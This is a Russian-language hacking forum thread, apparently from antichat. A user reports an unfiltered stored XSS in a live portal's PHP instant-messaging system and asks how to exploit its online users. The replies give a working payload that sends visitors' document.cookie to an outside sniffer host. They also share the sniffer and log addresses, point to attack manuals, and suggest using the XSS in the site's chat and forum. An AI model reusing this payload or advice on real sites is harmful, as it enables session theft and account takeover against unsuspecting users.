И так есть портал , в нем есть сам саит, чат, форум, и системка мгновенных сообщений всем юзерам он-лаина, она на php ... так вот в неи есть активная xss , после добавления сообщения с хсс , алерт вызывается у всех пользователей что он-лаин. Сам скрипт был такои: "><script>alert(document.cookie);</script>
тоесть никакие знаки не фильтруются. Так вот какои вопрос: что можно сделать ... чего добится? Извините за ньюбство :D Но просто хотелось бы знать многие варианты действий, которые можно совершить.

Я только сейчас понимаю как это тяжело каждый раз объяснять, что нужно делать в XSS.
Вообщем, в поиске на а-чате или Googool забей "XSS снифер". Там посмотри - должен сам разобраться.

"><script>alert(document.cookie);</script>
тоесть никакие знаки не фильтруются. Так вот какои вопрос: что можно сделать ... чего добится? Извините за ньюбство :D Но просто хотелось бы знать многие варианты действий, которые можно совершить.
1) Юзай сниффер!
Вот те мануал http://antichat.ru/sniff/
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg
Лог сниффера: http://antichat.ru/sniff/log.php
Можешь и персональный юзать например в http://s.netsec.ru
Далее в алерт впихаешь сниффа + документ кукис ... чтоб заполучить кукисы жертвы
Например:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Как только скрипт выполнится , можешь посмотреть на логи сниффера и хитро улыбатся =)

Спасиб за инфу!) Но я хотел бы знать, кроме "утаскивания" куков, можно ли чтонить еще сделать?

DDos Имхо можно сделать!
шутка :D
Вот тебе еще один мануал открй для себя многое
http://forum.antichat.ru/thread20140.html

DDos Имхо можно сделать!
шутка :D
Вот тебе еще один мануал открй для себя многое
http://forum.antichat.ru/thread20140.html

этот мануал я читал ... =( Кукисы мне просто не нужны ... да и получить их там неполучается ...

Разъясню что есть, есть портал на котором есть такая штука как мгновенные сообщения пользователям , что на саите , это сообщение открывается в небольшом маленьком php окошке ... но это окошко никаких куков не содержит ... я отправлял сообщение со скриптом на снифер ... но в логе снифера отображаются только ИПы и откуда они были направлены (тоесть с адреса того окна)
Так что утащить куки не получается ... :confused:

И так есть портал , в нем есть сам саит, чат, форум, и системка мгновенных сообщений всем юзерам он-лаина, она на php
ХSS можешь исаользовать на чате и в форуме
Кстати в мануале написано где и как можно использовать активную или пассивную XSS .. больше вариантов нет по использыванию XSS

Говорим спасибо Electro за ответ, а тему закрываем =) Ибо больше чем кража кук ты ничего не сделаешь.Закрыто.

P.S. а сам уезжаю отдыхать =)